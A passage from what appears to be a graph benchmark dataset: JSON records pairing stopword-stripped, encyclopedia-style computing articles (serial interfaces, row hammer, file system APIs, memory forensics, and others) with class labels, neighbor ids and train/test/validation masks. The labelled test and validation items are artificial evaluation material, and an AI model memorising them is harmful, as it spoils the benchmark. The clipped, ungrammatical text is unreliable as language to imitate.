    "text": "Synchronous_Serial_Interface:synchronous serial interface synchronous serial interface ssi widely used serial interface standard industrial applications master e.g controller slave e.g sensor ssi based rs-422 standards high protocol efficiency addition implementation various hardware platforms making popular among sensor manufacturers ssi originally developed max stegmann gmbh 1984 transmitting position data absolute encoders – reason servo/drive equipment manufacturers refer ssi port stegmann interface formerly covered german patent de 34 45 617 expired 1990 suitable applications demanding reliability robustness measurements varying industrial environments different serial peripheral interface bus spi ssi differential simplex non-multiplexed relies time-out frame data spi single-ended duplex multiplex uses select-line frame data however spi peripherals microcontrollers implement ssi external differential driver-ics program-controlled timing ssi synchronous point point serial communication channel digital data transmission synchronous data transmission one data transmitted synchronizing transmission receiving sending ends using common clock signal since start stop bits present allows better use data transmission bandwidth message bits makes whole transmission process simpler easier clock needs bandwidth included determining total bandwidth required communication two devices general mentioned earlier point point connection master e.g plc microcontroller slave e.g rotary encoders master controls clock sequence slave transmits current data/value shift register invoked master data clocked shift register master slave synchronized common clock controller clock data signals transmitted according rs-422 standards rs-422 also known ansi/tia/eia-422-b technical standard specifies electrical characteristics balanced voltage digital interface circuit data transmitted using balanced differential signalling i.e clock data lines basically twisted pair cables inputs use opto-coupler galvanic isolation details see driven rs-422/485 levels data output sensor driven rs-422/485 line driver differential signalling improves resistance electromagnetic interference emi hence making reliable communication channel long transmission lengths harsh external environments interface simple design illustrated figure consists 2 pairs wires one transmitting clock signals master transmitting data slave clock sequences triggered master need arises different clock frequencies used ranging 100 khz 2 mhz number clock pulses depends number data bits transmitted simplest ssi slave interface uses retriggerable monostable multivibrator monoflop freeze current value sensor current frozen values slave stored shift registers values clocked sequentially initiated controller design revolutionized integration microcontrollers fpgas asics interface data format designed way ensure proper communication data protocol data transmission based three different subsequent parts leading- ” 1 data-bits trailing- 0 main significance type format ensure proper working interface hence secure data transmission free hardware software errors idle state clock high level also sensor output high level used detecting broken wire contacts helps observing proper working condition interface n-clock pulses rising edges data completely transmitted next clock pulse rising edge n+1 sensor output goes low level used detect short circuit cable high even n+1 rising edges means interface short circuit readings multiple slaves three enabled time connecting common clock however avoid ground loops electrically isolate slave complete galvanic isolation opto-couplers needed following keywords useful understanding ssi data transmission procedure diagram illustrates single data transmission using ssi protocol ssi initially idle mode data clock lines stay high slave keeps updating current data transmission mode evoked master initiates train clock pulses slave receives beginning clock signal 1 automatically freezes current data first rising edge 2 clock sequence msb sensor ’ value transmitted consequent rising edges bits sequentially transmitted output transmission complete data word 3 i.e lsb transmitted additional rising edge clock sets clock line high data line set low remains period time tm recognize transfer timeout clock signal data-output request received within time data transmitted multiple transmission slave starts updating value data line set high idle mode clock pulses within time tm marks end single transmission data word slave receives clock signal time tp =tm updated position value frozen transmission value begins described earlier multiple transmissions data happens continuous clocking even transmission least significant bit i.e clock pulses allow monoflop go steady state illustrated initial sequences single transmission idle state clock data lines high arrival first falling edge transmission mode evoked similarly data bits transmitted sequentially starting msb every rising edge transmission lsb means transmission data completed additional rising edge pushes data line low signifying end transmission particular data continuous clock pulses even i.e next clock pulses comes time tw tm value slave updated monoflop still unsteady value shift register still contains value next rising edge i.e n+1 rising edge transmission data continues msb data transmitted earlier re-transmitted end tw follows procedure earlier transmissions leading multiple transmissions data value slave updated timing two clock pulses transfer timeout tm multiple transmission used check data integrity two consecutive received values compared transmission failures indicated differences two values transmission data controlled master transmission interrupted time stopping clock sequence period longer tm slave automatically recognize transfer timeout go idle mode since ssi based rs-422 standards necessary select appropriate cables stay within limits cabling length clock frequencies relation cable length clock frequency shown following figure used conservative guide curve based upon empirical data using 24 awg standard copper conductor unshielded twisted-pair telephone cable shunt capacitance 52.5 pf/meter 16 pf/foot terminated 100 ohm resistive load cable length restriction shown curve based upon assumed load signal quality requirements high data rates used application limited shorter cables possible use longer cables low data rates used dc resistance cable limits length cable low data rate applications increasing noise margin voltage drop cable increases ac effects cable limit quality signal limit cable length short distances high data rates used examples data rate cable length combinations vary 90 kbit/s 1.2 km 10 mbit/s 5m rs-422 cables characteristics different twisted pair 24 awg 52.5 pf/meter 16 pf/foot also employed within bounds mentioned first determine absolute loop resistance capacitance values typical 24 awg cable provided cable length associated data signalling rate desired figure convert values equivalent lengths cable actually used example longer distances would possible using 19 awg shorter distances would necessary 28 awg maximum permissible length cable separating master slave function data signalling rate influenced tolerable signal distortion amount longitudinally coupled noise ground potential differences introduced master slave circuit accordingly users advised restrict cable length minimum type length cable used must capable maintaining necessary signal quality needed particular application furthermore cable balance must maintain acceptable crosstalk levels generated received manufacturers organizations added additional information basic ssi protocol done mainly ensure proper data transmission secure transmission indicate end data transmission crc bits parity bits added simple words used identifying byte correctly interpreted received original specification multiple transmissions used ensure data integrity case two consecutive transmissions data initiated compared error transmission however reduces protocol efficiency 50 compared parallel data transmission limitations interface negligible applications industrial automation ssi handle short distance communication 1.2 km supports one master device 1.2 km rather good distance communication automation industry standards compared advanced communication systems based field buses ethernet ssi limited master slave architecture simple point point communication master slave another disadvantage hardware slave acknowledgment i.e detection slave communication",
    "neighbors": [
      2994
    ],
    "mask": "None"
  },
  {
    "node_id": 7597,
    "label": 0,
    "text": "EuroWordNet:eurowordnet eurowordnet system semantic networks european languages based wordnet language develops wordnet interconnected interlingual links stored interlingual index ili unlike original princeton wordnet wordnets freely available original eurowordnet project dealt dutch italian spanish german french czech estonian wordnets frozen wordnets languages developed varying degrees examples eurowordnet available free access full database however charged cases openthesaurus babelnet may serve free alternative",
    "neighbors": [
      416,
      6145,
      1890,
      396
    ],
    "mask": "Train"
  },
  {
    "node_id": 7598,
    "label": 3,
    "text": "Scoreboarding:scoreboarding scoreboarding centralized method first used cdc 6600 computer dynamically scheduling pipeline instructions execute order conflicts hardware available scoreboard data dependencies every instruction logged instructions released scoreboard determines conflicts previously issued incomplete instructions instruction stalled unsafe continue scoreboard monitors flow executing instructions dependencies resolved stalled instruction issued instructions decoded order go following four stages control execution instructions scoreboard maintains three status tables detailed algorithm scoreboard control described scoreboarding method must stall issue stage functional unit available case future instructions could potentially executed wait structural hazard resolved techniques like tomasulo algorithm avoid structural hazard also resolve war waw dependencies register renaming",
    "neighbors": [
      10781,
      6181,
      508,
      3470,
      6926,
      10779,
      5948,
      3421
    ],
    "mask": "None"
  },
  {
    "node_id": 7599,
    "label": 0,
    "text": "Text_corpus:text corpus linguistics corpus plural corpora text corpus large structured set texts nowadays usually electronically stored processed corpus linguistics used statistical analysis hypothesis testing checking occurrences validating linguistic rules within specific language territory corpus may contain texts single language monolingual corpus text data multiple languages multilingual corpus multilingual corpora specially formatted side-by-side comparison called aligned parallel corpora two main types parallel corpora contain texts two languages translation corpus texts one language translations texts language comparable corpus texts kind cover content translations exploit parallel text kind text alignment identifying equivalent text segments phrases sentences prerequisite analysis machine translation algorithms translating two languages often trained using parallel fragments comprising first language corpus second language corpus element-for-element translation first language corpus order make corpora useful linguistic research often subjected process known annotation example annotating corpus part-of-speech tagging pos-tagging information word part speech verb noun adjective etc added corpus form tags another example indicating lemma base form word language corpus working language researchers use interlinear glossing used make annotation bilingual corpora structured levels analysis applied particular number smaller corpora may fully parsed corpora usually called treebanks parsed corpora difficulty ensuring entire corpus completely consistently annotated means corpora usually smaller containing around one three million words levels linguistic structured analysis possible including annotations morphology semantics pragmatics corpora main knowledge base corpus linguistics analysis processing various types corpora also subject much work computational linguistics speech recognition machine translation often used create hidden markov models part speech tagging purposes corpora frequency lists derived useful language teaching corpora considered type foreign language writing aid contextualised grammatical knowledge acquired non-native language users exposure authentic texts corpora allows learners grasp manner sentence formation target language enabling effective writing text corpora also used study historical documents example attempts decipher ancient scripts biblical scholarship archaeological corpora short duration provide snapshot time one shortest corpora time may 15–30 year amarna letters texts 1350 bc corpus ancient city example kültepe texts turkey may go series corpora determined find site dates",
    "neighbors": [
      5122,
      8323,
      2440,
      10634,
      2059,
      6798,
      11538,
      1044,
      5781,
      5399,
      538,
      3227,
      3743,
      5667,
      3748,
      5668,
      2858,
      5676,
      10160,
      3635,
      4531,
      4662,
      3127,
      2488,
      7353,
      7995,
      10557,
      6208,
      11206,
      2247,
      3533,
      5197,
      3663,
      6223,
      9552,
      2770,
      10577,
      11348,
      11474,
      8538,
      10847,
      3808,
      5857,
      1890,
      7780,
      9956,
      5478,
      9702,
      9577,
      3694,
      7918,
      8046,
      8688,
      10610,
      4468,
      10231,
      8440,
      7164,
      10621,
      6655
    ],
    "mask": "Test"
  },
  {
    "node_id": 7600,
    "label": 4,
    "text": "Vincent_Moscaritolo:vincent moscaritolo vincent moscaritolo american computer security expert known work encryption applications mobile devices 2012 2015 distinguished member technical staff silent circle designed original messaging technologies silent circle uses 2015 left silent circle co-found 4th-a technologies llc robbie hanson 4th-a technologies develops technologies restore restore people inalienable right “ secure documents ” designed zerodark.cloud framework simplifies development apps interact cloud performs tasks syncing messaging collaboration uses zero-knowledge encryption ensuring data cloud compromised also produced storm4 secure cloud storage service vincent involved design invention production system software network applications 30 years addition producing cryptographic products concern use encryption technology criminal terrorist actors compelled offer assistance training law enforcement intelligence community cryptographic issues participated specialized venues fbi information technology study group drug enforcement administration office investigative technology infragard cloud security alliance vincent moscaritolo experience includes roles distinguished member technical staff silent circle principal cryptographic engineer pgp corporation senior operating system engineer apple computer principal software specialist digital equipment corporation vincent one co founders silent circle developer secure messaging technology used silent circle blackphone designed silent circle instant messaging protocol scimp inventor progressive encryption used silent text app pgp focused engineering cryptographic products os x platform including cross platform core crypto library secure file deletion virtual disk client network kernel engine redirection module also responsible obtaining maintaining nist fips-140 validation pgp cryptographic core apple notable founding mac-crypto conference key mac developers industry leaders legends met discuss topics ranging cryptosystems digital cash security issues feedback sessions developers able directly discuss requirements apple engineers also involved original cypherpunk group mid 1980s founded startup called datavox produced banktalk one first voice response systems financial marketplace included user-tailorable audio menu system provided general information balance account transactions able communicate bank mainframes existing atm network vincent latest project zerodark.cloud framework moscaritolo published article s4 open-source crypto library verifying authenticity public keys moscaritolo designed silent circle instant messaging protocol scimp uses new progressive encryption technology cryptographic projects include development public key authentication extension file servers authoring ietf draft secure authorization protocol distributed systems development code technotes pgp cryptographic toolkit number presentations tutorials modern cryptosystems security also contributor vanish self destructing data project university washington holds patents related cryptographic techniques designs pass laws could criminals avid outdoorsman vincent usually spends weekends hiking snowshoeing deep woods southern oregon daughter son background variety fields including motorcycle racing number martial arts trauma medicine",
    "neighbors": [
      10741,
      3354,
      3941,
      997
    ],
    "mask": "None"
  },
  {
    "node_id": 7601,
    "label": 4,
    "text": "Row_hammer:row hammer row hammer also written rowhammer unintended undesirable side effect dynamic random-access memory dram memory cells leak charges interact electrically possibly leaking changing contents nearby memory rows addressed original memory access bypass isolation dram memory cells results high cell density modern dram triggered specially crafted memory access patterns rapidly activate memory rows numerous times row hammer effect used privilege escalation computer security exploits network-based attacks also theoretically possible fast network connection attacker victim different hardware-based techniques exist prevent row hammer effect occurring including required support processors types dram memory modules row hammer rarely never affects ddr ddr2 sdram modules affects many ddr3 ddr4 sdram modules dynamic ram dram bit stored data occupies separate memory cell electrically implemented one capacitor one transistor charge state capacitor charged discharged determines whether dram cell stores 1 0 binary value huge numbers dram memory cells packed integrated circuits together additional logic organises cells purposes reading writing refreshing data memory cells blue squares illustration organised matrices addressed rows columns memory address applied matrix broken row address column address processed row column address decoders illustration vertical horizontal green rectangles respectively row address selects row read operation selection also known row activation bits cells row transferred sense amplifiers form row buffer red squares illustration exact bit selected using column address consequently read operations destructive nature design dram requires memory cells rewritten values read transferring cell charges row buffer write operations decode addresses similar way result design entire rows must rewritten value single bit changed result storing data bits using capacitors natural discharge rate dram memory cells lose state time require periodic rewriting memory cells process known refreshing another result design dram memory susceptible random changes stored data known soft memory errors attributed cosmic rays causes different techniques counteract soft memory errors improve reliability dram error-correcting code ecc memory advanced variants lockstep memory commonly used increased densities dram integrated circuits ics led physically smaller memory cells capable storing smaller charges resulting lower operational noise margins increased rates electromagnetic interactions memory cells greater possibility data loss result disturbance errors observed caused cells interfering operation manifesting random changes values bits stored affected memory cells awareness disturbance errors dates back early 1970s intel 1103 first commercially available dram ic since dram manufacturers employed various mitigation techniques counteract disturbance errors improving isolation cells performing production testing however researchers proved 2014 analysis commercially available ddr3 sdram chips manufactured 2012 2013 susceptible disturbance errors using term row hammer name associated side effect led observed bit flips opportunity row hammer effect occur ddr3 memory primarily attributed ddr3 high density memory cells results associated interactions cells rapid dram row activations determined primary cause frequent row activations cause voltage fluctuations associated row selection lines observed induce higher-than-natural discharge rates capacitors belonging nearby adjacent cases memory rows called victim rows affected memory cells refreshed lose much charge disturbance errors occur tests show disturbance error may observed performing around 139,000 subsequent memory row accesses cache flushes one memory cell every 1,700 cells may susceptible tests also show rate disturbance errors substantially affected increased environment temperature depends actual contents dram certain bit patterns result significantly higher disturbance error rates variant called double-sided hammering involves targeted activations two dram rows surrounding victim row illustration provided section variant would activating yellow rows aim inducing bit flips purple row case would victim row tests show approach may result significantly higher rate disturbance errors compared variant activates one victim row neighbouring dram rows different methods exist less successful detection prevention correction mitigation row hammer effect tests show simple ecc solutions providing single-error correction double-error detection sec ded capabilities able correct detect observed disturbance errors include two flipped bits per memory word flipping three bits prevents ecc noticing modification effective solution introduce frequent memory refreshing refresh intervals shorter usual 64 ms technique results higher power consumption increased processing overhead vendors provide firmware updates implement type mitigation one complex prevention measures performs counter-based identification frequently accessed memory rows proactively refreshes neighbouring rows another method issues additional infrequent random refreshes memory rows neighbouring accessed rows regardless access frequency research shows two prevention measures cause negligible performance impacts since release ivy bridge microarchitecture intel xeon processors support so-called pseudo target row refresh ptrr used combination ptrr-compliant ddr3 dual in-line memory modules dimms mitigate row hammer effect automatically refreshing possible victim rows negative impact performance power consumption used dimms ptrr-compliant xeon processors default fall back performing dram refreshes twice usual frequency results slightly higher memory access latency may reduce memory bandwidth 2–4 lpddr4 mobile memory standard published jedec includes optional hardware support so-called target row refresh trr prevents row hammer effect without negatively impacting performance power consumption additionally manufacturers implement trr ddr4 products although part ddr4 memory standard published jedec internally trr identifies possible victim rows counting number row activations comparing predefined chip-specific maximum activate count mac maximum activate window values refreshes rows prevent bit flips mac value maximum total number row activations may encountered particular dram row within time interval equal shorter amount time neighbouring rows identified victim rows trr may also flag row victim row sum row activations two neighbouring rows reaches mac limit within time window due necessity huge numbers rapidly performed dram row activations row hammer exploits issue large numbers uncached memory accesses cause cache misses detected monitoring rate cache misses unusual peaks using hardware performance counters version 5.0 memtest86 memory diagnostic software released december 3 2013 added row hammer test checks whether computer ram susceptible disturbance errors works computer boots uefi without uefi boots older version hammer test memory protection way preventing processes accessing memory assigned one concepts behind modern operating systems using memory protection combination security-related mechanisms protection rings possible achieve privilege separation processes programs computer systems general divided parts limited specific privileges require perform particular task using privilege separation also reduce extent potential damage caused computer security attacks restricting effects specific parts system disturbance errors explained section effectively defeat various layers memory protection short circuiting low hardware level practically creating unique attack vector type allows processes alter contents arbitrary parts main memory directly manipulating underlying memory hardware comparison conventional attack vectors buffer overflows aim circumventing protection mechanisms software level exploiting various programming mistakes achieve alterations otherwise inaccessible main memory contents initial research row hammer effect published june 2014 described nature disturbance errors indicated potential constructing attack provide examples working security exploit subsequent october 2014 research paper imply existence security-related issues arising row hammer effect march 9 2015 google project zero revealed two working privilege escalation exploits based row hammer effect establishing exploitable nature x86-64 architecture one revealed exploits targets google native client nacl mechanism running limited subset x86-64 machine instructions within sandbox exploiting row hammer effect escape sandbox gain ability issue system calls directly nacl vulnerability tracked mitigated modifying nacl allow execution codice_1 cache line flush machine instruction previously believed required constructing effective row hammer attack second exploit revealed project zero runs unprivileged linux process x86-64 architecture exploiting row hammer effect gain unrestricted access physical memory installed computer combining disturbance errors memory spraying exploit capable altering page table entries ptes used virtual memory system mapping virtual addresses physical addresses results exploit gaining unrestricted memory access due nature inability x86-64 architecture make codice_1 privileged machine instruction exploit hardly mitigated computers use hardware built-in row hammer prevention mechanisms testing viability exploits project zero found half 29 tested laptops experienced disturbance errors occurring vulnerable laptops less five minutes running row-hammer-inducing code tested laptops manufactured 2010 2014 used non-ecc ddr3 memory july 2015 group security researchers published paper describes architecture- instruction-set-independent way exploiting row hammer effect instead relying codice_1 instruction perform cache flushes approach achieves uncached memory accesses causing high rate cache eviction using carefully selected memory access patterns although cache replacement policies differ processors approach overcomes architectural differences employing adaptive cache eviction strategy algorithm proof concept approach provided native code implementation pure javascript implementation runs firefox 39 javascript implementation called rowhammer.js uses large typed arrays relies internal allocation using large pages result demonstrates high-level exploit low-level vulnerability october 2016 researchers vusec systems network security group vu amsterdam published drammer android app uses rowhammer methods reliably gain root access several popular models smartphones vulnerability acknowledged cve-2016-6728 patch released google within month mitigate effect however due general nature possible implementations attack effective software patch difficult reliably implement fact june 2018 proposals made academia industry either impractical deploy insufficient stopping attacks mitigate attacks researchers vusec systems proposed lightweight defense prevents dma-based attacks isolating dma buffers guard rows software states vulnerable rowhammer attacks attacker thus needs find right target states order utilise rowhammer errors practice one main challenges identifying target states typically done domain experts mainstream fault tolerance community responded rowhammer attacks systematic methodology used identify validate evaluate rowhammer attack target states exploitability work based well-established fault injection-based experimental methodology generalised attack target states found practical target states previously unknown",
    "neighbors": [
      1024,
      5636,
      6675,
      7187,
      535,
      10776,
      25,
      4637,
      9761,
      9762,
      4644,
      4133,
      5158,
      10284,
      7217,
      9784,
      10809,
      576,
      1608,
      3657,
      8779,
      10333,
      4703,
      8288,
      97,
      8292,
      8298,
      7285,
      3702,
      9335,
      2168,
      1147,
      7804,
      3197,
      1150,
      3711,
      8320,
      10875,
      2179,
      5764,
      10883,
      2187,
      6797,
      4240,
      4755,
      2709,
      9366,
      1688,
      6296,
      8344,
      2717,
      7325,
      9375,
      9887,
      3248,
      9904,
      6834,
      9395,
      6837,
      8886,
      8388,
      9932,
      3789,
      4304,
      5840,
      7382,
      4314,
      8410,
      9435,
      3807,
      2275,
      1253,
      1254,
      5349,
      5356,
      10477,
      1776,
      5363,
      9460,
      2811,
      3323,
      2815,
      3843,
      10499,
      10502,
      1804,
      273,
      11537,
      10003,
      11539,
      4886,
      10016,
      4389,
      10235,
      2345,
      8489,
      11052,
      9518,
      7983,
      823,
      6968,
      4409,
      7483,
      11075,
      4423,
      6474,
      2383,
      5457,
      11601,
      6484,
      857,
      1882,
      10590,
      9055,
      8551,
      4972,
      3956,
      5492,
      9082,
      7039,
      3462,
      394,
      3978,
      398,
      11152,
      3473,
      6033,
      7057,
      10132,
      11667,
      8092,
      1440,
      5024,
      421,
      11175,
      5547,
      11184,
      1970,
      441,
      1979,
      4027,
      6075,
      6078,
      9151,
      1474,
      6596,
      8136,
      11221,
      4054,
      5078,
      3547,
      1504,
      9186,
      2542,
      10734,
      6128,
      5619,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7602,
    "label": 2,
    "text": "Tvheadend:tvheadend tvheadend sometimes tvh short server application reads video streams linuxtv sources publishes internet streams supports multiple inputs dvb-t usb tuner stick sat ip tuner instance combining together single channel listing tvh servers ip signal providers allowing networks tvh servers combined tvh typically used send video receiver devices like smart televisions set top boxes throughout household network also used forward signals long distance links even countries also includes electronic program guide information available ability record programs like dvr including ability transcode mpeg2 h264 h265",
    "neighbors": [
      1700,
      6058,
      1674,
      6380,
      4147,
      1107,
      8124
    ],
    "mask": "None"
  },
  {
    "node_id": 7603,
    "label": 6,
    "text": "File_system_API:file system api file system api application programming interface utility user program requests services file system operating system may provide abstractions accessing different file systems transparently file system apis may also include interfaces maintenance operations creating initializing file system verifying file system integrity defragmentation operating system includes apis needed file systems supports microsoft windows file system apis ntfs several fat file systems linux systems include apis ext2 ext3 reiserfs btrfs name early operating systems capable handling tape disk file systems provided basic interfaces coordination device allocation deallocation required addition file systems provided services interfaces defined additional file system types hierarchy structure supported media increased additional features needed specialized functions multi-user systems required apis writing user data file system provided use directly user program run-time library run-time library programming languages may provide type conversion formatting blocking file systems provide identification records key may include re-writing existing record operation sometimes called codice_1 record exists reading user data sometimes called get may include direction forward reverse case keyed file system specific key writing run-time libraries may intercede user program positioning includes adjusting location next record may include skipping forward reverse well positioning beginning end file open api may explicitly requested implicitly invoked upon issuance first operation process object may cause mounting removable media establishing connection another host validating location accessibility object updates system structures indicate object use usual requirements requesting access file system object include additional information may necessary example requested via programming language library may provide coordination among modules process addition forwarding request file system must expected something may go wrong processing open depending programming language additional specifications open may establish modules handle conditions libraries specify library module file system permitting analysis opening program unable perform meaningful action result failure example failure attempt open necessary input file action may report failure abort program languages simply return code indicating type failure always must checked program decides report continue close may cause dismounting ejecting removable media updating library file system structures indicate object longer use minimal specification close references object additionally file systems provide specifying disposition object may indicate object discarded longer part file system similar open must expected something may go wrong considerations handling failure similar open information data file called metadata metadata maintained file system example last-modification date various dates depending file system location beginning file size file file system backup utility saved current version files items usually altered user program additional meta data supported file systems may include owner file group file belongs well permissions and/or access control i.e access updates various users groups may perform whether file normally visible directory listed items usually modifiable file system utilities may executed owner applications store metadata images metadata may include camera model settings used take photo audio files meta data may include album artist recorded recording comments recording may specific particular copy file i.e different copies recording may different comments update owner file documents may include items like checked-by approved-by etc renaming file moving file subdirectory one directory another deleting file examples operations provide file system management directories metadata operations permitting restricting access directory various users groups users usually included filesystem used directories files records may added deleted modified usually causes inefficiencies underlying data structures things like logically sequential blocks distributed across media way causes excessive repositioning partially used even empty blocks included linked structures incomplete structures inconsistencies may caused device media errors inadequate time detection impending loss power actual power loss improper system shutdown media removal rare occasions file system coding errors specialized routines file system included optimize repair structures usually invoked user directly triggered within file system internal counters number levels structures number inserted objects may compared thresholds may cause user access suspended specific structure usually displeasure user users effected may started low priority asynchronous tasks may deferred time low user activity sometimes routines invoked scheduled system manager case defragmentation api kernel-level kernel provides interfaces filesystems developers also space filesystem code resides differs old schema kernel uses facilities talk filesystem driver vice versa contrary kernel one handles filesystem layout filesystem one directly access hardware cleanest scheme resolves difficulties major rewrite old scheme modular kernels allows adding filesystems kernel module even third party ones non-modular kernels however requires kernel recompiled new filesystem code closed-source kernels makes third party filesystem impossible unixes unix-like systems linux used modular scheme variation scheme used ms-dos dos 4.0 onward compatibles support cd-rom network file systems instead adding code kernel old scheme using kernel facilities kernel-based scheme traps calls file identifies redirected kernel equivalent function handled specific filesystem driver filesystem driver directly access disk contents using low-level bios functions api driver-based kernel provides facilities file system code resides totally external kernel even module modular kernel cleaner scheme filesystem code totally independent allows filesystems created closed-source kernels online filesystem additions removals system examples scheme windows nt os/2 respective ifss api filesystems kernel like kernel-based apis automatically trapped another api driver-based os scheme used windows 3.1 providing fat filesystem driver 32-bit protected mode cached vfat bypassed dos fat driver kernel msdos.sys completely later windows 9x series 95 98 vfat iso9660 filesystem driver along joliet network shares third party filesystem drivers well adding original dos apis lfn api ifs drivers intercept already existent dos file apis also add new ones within 32-bit protected mode executable however api completely documented third parties found make-it-by-yourself scenario even worse kernel-based apis api user space filesystem directly use kernel facilities accesses disks using high-level operating system functions provides functions library series utilities use access filesystem useful handling disk images advantage filesystem made portable operating systems high-level operating system functions uses common ansi c disadvantage api unique application implements one examples scheme hfsutils adflib filesystems least disk ones need equivalent functions provided kernel possible easily port filesystem code one api another even different types example ext2 driver os/2 simply wrapper linux vfs os/2 ifs linux ext2 kernel-based hfs driver os/2 port hfsutils os/2 ifs also exists project uses windows nt ifs driver making ntfs work linux",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6813,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      2804,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      8976,
      1810,
      5397,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      7540,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      5514,
      8075,
      7565,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      3496,
      4012,
      1454,
      6062,
      8114,
      8631,
      1464,
      1978,
      8643,
      9166,
      7126,
      2015,
      1509,
      9189,
      1515,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7604,
    "label": 3,
    "text": "Autonomous_peripheral_operation:autonomous peripheral operation computing autonomous peripheral operation hardware feature found modern microcontroller architectures off-load certain tasks embedded autonomous peripherals order minimize latencies improve throughput hard real-time applications well save energy ultra-low-power designs forms autonomous peripherals microcontrollers first introduced around 2005 allowing embedded peripherals work independently cpu even interact certain pre-configurable ways off-loads event-driven communication peripherals help improve real-time performance due lower latency allows potentially higher data throughput due added parallelism since 2009 scheme improved newer implementations continue functioning sleep modes well thereby allowing cpu remain dormant longer periods time order save energy partially driven iot market conceptually autonomous peripheral operation seen generalization mixture direct memory access dma hardware interrupts peripherals issue event signals called event generators producers whereas target peripherals called event users consumers implementations peripherals configured pre-process incoming data perform various peripheral-specific functions like comparing windowing filtering averaging hardware without pass data cpu processing known implementations include",
    "neighbors": [
      7235,
      4773,
      9638,
      9928,
      682,
      3882,
      11405,
      5457,
      2517,
      10102,
      7519
    ],
    "mask": "Test"
  },
  {
    "node_id": 7605,
    "label": 4,
    "text": "Memory_forensics:memory forensics memory forensics forensic analysis computer memory dump primary application investigation advanced computer attacks stealthy enough avoid leaving data computer hard drive consequently memory ram must analyzed forensic information prior 2004 memory forensics done ad hoc basis using generic data analysis tools like strings grep tools specifically created memory forensics therefore difficult use also provide limited information general primary usage extract text memory dump many operating systems provide features kernel developers end-users actually create snapshot physical memory either debugging core dump blue screen death purposes experience enhancement hibernation computing case microsoft windows crash dumps hibernation present since microsoft windows nt microsoft crash dumps always analyzable microsoft windbg windows hibernation files hiberfil.sys nowadays convertible microsoft crash dumps using utilities like moonsols windows memory toolkit designed matthieu suiche february 2004 michael ford introduced memory forensics security investigations article sysadmin magazine article demonstrated analysis memory based rootkit process utilized existing linux crash utility well two tools developed specifically recover analyze memory forensically memget mempeek 2005 dfrws issued memory analysis forensics challenge response challenge tools generation specifically designed analyze memory dumps created tools knowledge operating system internal data structures thus capable reconstructing operating system process list process information although intended research tools proved operating system level memory forensics possible practical subsequently several memory forensics tools developed intended practical use include commercial tools like memoryze moonsols windows memory toolkit winen belkasoft live ram capturer etc open source tools like volatility new features added analysis linux mac os x memory dumps substantial academic research carried unlike microsoft windows mac os x interest relatively new initiated matthieu suiche 2010 black hat briefings security conference currently memory forensics standard component incident response since 2010 started see utilities focusing visualization aspect memory analysis moonsols livecloudkd presented matthieu suiche microsoft bluehat security briefings inspired new feature microsoft livekd written mark russinovich allow virtual machines introspection accessing memory guest virtual machine host virtual machine order either analyze directly assistance microsoft windbg acquire memory dump microsoft crash dump file format",
    "neighbors": [
      7618,
      2275,
      1540,
      3109,
      3172,
      4423,
      5284,
      10437,
      6797,
      7983,
      8976,
      1525,
      2747
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7606,
    "label": 4,
    "text": "Information_diving:information diving information diving practice recovering technical data sometimes confidential secret discarded material recent times chiefly data storage elements discarded computers notably recoverable data remaining hard drives charge discarding computers usually neglect erase hard drive often circumstances information diver copy installed software e.g. word processors operating systems computer games etc. data may also available credit card information stored machine companies claim especially careful customer data number data breaches type entity e.g. education health care insurance government ... suggest problems well uk information diving referred binology earlier times available discarded data included printed manuals design records famous case student jerry schneider discovered discarded manuals telephone system ordering shipping system able build business selling 'surplus gear ordered telephone company though internal company department today files letters memos photographs ids passwords credit cards found dumpsters many people consider sensitive information items discarded may recovered information recovered sometimes usable fraudulent purposes see also identity theft physical information security two mit students purchased large number obsolete computers yard sales like found everything credit card information tax return data published paper remembrance things past documenting discoveries supposedly information diving common 1980s due lax security businesses became aware need increased security early 1990s sensitive documents shredded placed dumpsters still considerable internet activity subject dumpster diving unlikely stopped widespread introduction document shredding security mythology curious hackers malicious crackers commonly use technique dumpster diving commonly practiced watchdog organizations seeking information groups investigating trinity foundation successfully used technique report activities televangelist robert tilton also obtained information benny hinn using practice also sometimes used attorneys agents seeking enforce court-ordered money judgments judgment debtor trash may contain information assets more-readily located levying",
    "neighbors": [
      3972,
      2812,
      2558,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 7607,
    "label": 3,
    "text": "Z/Architecture:z/architecture z/architecture initially briefly called esa modal extensions esame ibm 64-bit instruction set architecture implemented mainframe computers ibm introduced first z/architecture-based system z900 late 2000 later z/architecture systems include ibm z800 z990 z890 system z9 system z10 zenterprise 196 zenterprise 114 zec12 zbc12 z13 z14 z/architecture retains backward compatibility previous 32-bit-data/31-bit-addressing architecture esa/390 predecessors way back 32-bit-data/24-bit-addressing system/360 ibm z13 last z systems server support running operating system esa/390 architecture mode however 24-bit 31-bit problem-state application programs originally written run esa/390 architecture unaffected change z/os address space called 64-bit address space 16 exabytes size z/os address space 8 billion times size former 2-gigabyte address space operating systems including z/os generally restrict code execution first 2 gb 31 address bits 2 addressable bytes virtual address space reasons efficiency compatibility rather architectural limits z/os implementation java programming language exception z/os virtual memory implementation supports multiple 2 gb address spaces permitting 2 gb concurrently resident program code 64-bit version linux system z allows code execute within 64-bit address ranges programmers need store large amounts data 64-bit address space usually suffices applications need 16 exabyte data address space employ extended addressability techniques using additional address spaces data-only spaces data-only spaces available user programs called spaces similar areas virtual storage program 